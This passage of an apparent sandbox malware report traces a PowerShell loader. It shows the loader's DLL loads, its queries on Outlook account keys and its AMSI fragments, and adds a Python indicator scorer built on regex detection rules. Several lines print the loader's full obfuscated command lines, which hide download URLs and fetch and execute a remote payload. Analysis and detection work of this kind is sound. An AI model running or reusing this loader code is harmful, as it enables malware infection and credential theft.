              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: pdh.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\relog.exe | Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Section loaded: wininet.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: wab.exe
              Source: Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match | File source: 0000001A.00000002.2815364367.0000000004843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.2702490356.000000000A283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.2668039251.0000000005634000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.2701170946.00000000085A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2199790164.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((badarrah $Repine $Radiologernes), (Klassekvotienterne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Squamate = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mercerization)), $Tradeful).DefineDynamicModule($Caic, $false).DefineType($Brandishing, $Gundeck, [System.MulticastDelegate])$Dissoul.
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tvetunget $Sagsomkostninger $Regeringernes), (Komponentplaceringstegning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:udgangsforbud = [AppDomain]::Curre
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tallote)), $Nektarin199).DefineDynamicModule($Unoriginal, $false).DefineType($Rhabdom, $Vedhftendes, [System.MulticastDelegate])$Debar
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe
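The AMSI buffers above show, in truncated form, the three traits that give this loader away to a script-block or AMSI consumer: Base64 decoded to ASCII and then sliced with Substring, a delegate built with GetDelegateForFunctionPointer whose parameter list ([IntPtr], [UInt32], [UInt32], [UInt32]) returning [IntPtr] is the shape of VirtualAlloc, and a dynamic assembly defined only to host a MulticastDelegate type. The scorer below is an added example, not detection content from the report or from Joe Sandbox; its rule names, weights and threshold are the example's own choices. The sample buffers are copied from the AMSI lines above and from the head of the command line recorded later in this report, and the benign script block is constructed for contrast. Because AMSI hands over buffers one at a time and each is only a fragment, the example also accumulates rule hits per process, which is what lifts the individually weak fragments over the threshold.

```python
"""Indicator scoring for PowerShell script-block / AMSI buffers.

Added example, not part of the report or of Joe Sandbox. Rule names, weights
and the threshold are this example's own choices; AMSI_BUFFERS and
CMDLINE_HEAD are copied from this report, BENIGN is constructed for contrast.
"""
import re

FLAGS = re.IGNORECASE | re.DOTALL

# (rule name, pattern, weight).  Patterns key on call shapes and signatures,
# not on variable names, which this loader randomises per build.
RULES = [
    # 'SUBsTR' ... += 'ing': the method name Substring is assembled at run time
    ("name_split", re.compile(r"'substr'\s*;.*?\+=\s*'ing'", FLAGS), 2),
    # For($i=2; ...; $i+=3): only every third character of a literal is real
    ("char_stuffing", re.compile(r"For\(\s*\$\w+=2;.*?\+=3\)", FLAGS), 2),
    # Base64 -> ASCII -> Substring: a payload carved out of a larger blob
    ("base64_unpack", re.compile(r"FromBase64String\(.*?GetString\(.*?\.substring\(", FLAGS), 2),
    # Reflective P/Invoke without Add-Type (no csc.exe, no temp assembly on disk)
    ("reflective_delegate", re.compile(r"GetDelegateForFunctionPointer\(", FLAGS), 2),
    # (LPVOID, SIZE_T, DWORD, DWORD) -> LPVOID is the shape of VirtualAlloc
    ("valloc_signature", re.compile(
        r"@\(\[IntPtr\],\s*\[UInt32\],\s*\[UInt32\],\s*\[UInt32\]\)\s*\(\[IntPtr\]\)", FLAGS), 3),
    # Dynamic assembly created only to define the delegate type
    ("dynamic_assembly", re.compile(
        r"DefineDynamicAssembly\(.*?DefineDynamicModule\(.*?DefineType\(", FLAGS), 2),
    ("multicast_delegate", re.compile(r"\[System\.MulticastDelegate\]", FLAGS), 1),
]


def score_buffer(text):
    """Score one buffer; returns (score, names of the rules that hit, in RULES order)."""
    hits = [name for name, pat, _ in RULES if pat.search(text)]
    return sum(w for name, _, w in RULES if name in hits), hits


def score_process(buffers, threshold=4):
    """Accumulate distinct rule hits over every buffer seen from one process.

    A rule counts once however many buffers it fires in, so a loop that keeps
    re-evaluating the same decoder does not inflate the score; the fragments
    that are weak on their own add up to a verdict for the process.
    """
    seen = set()
    for buf in buffers:
        seen.update(score_buffer(buf)[1])
    total = sum(w for name, _, w in RULES if name in seen)
    return total, [name for name, _, _ in RULES if name in seen], total >= threshold


# Copied from the AMSI lines of this report (each one truncated by the sandbox).
AMSI_BUFFERS = [
    "FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F",
    "GetDelegateForFunctionPointer((badarrah $Repine $Radiologernes), (Klassekvotienterne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Squamate = [AppDomain]::CurrentDomain.GetAssemblies()",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mercerization)), $Tradeful).DefineDynamicModule($Caic, $false).DefineType($Brandishing, $Gundeck, [System.MulticastDelegate])$Dissoul.",
]

# Head of the powershell.exe command line recorded for this sample.
CMDLINE_HEAD = (
    "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}"
    "$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;"
    "For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){"
    "$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}"
)

# Constructed benign script block for contrast; not from the report.
BENIGN = r"Get-ChildItem -Path C:\Users -Recurse | Where-Object { $_.PSIsContainer } | Select-Object FullName"

if __name__ == "__main__":
    for buf in AMSI_BUFFERS + [CMDLINE_HEAD, BENIGN]:
        print(score_buffer(buf), buf[:40])
    print("process verdict:", score_process(AMSI_BUFFERS + [CMDLINE_HEAD]))
```

Scored one at a time, only the delegate buffer and the command-line head reach the threshold; scored as one process, all seven rules fire and the sum is well past it, which is the argument for correlating AMSI or 4104 events by process rather than alerting on single buffers.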
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ 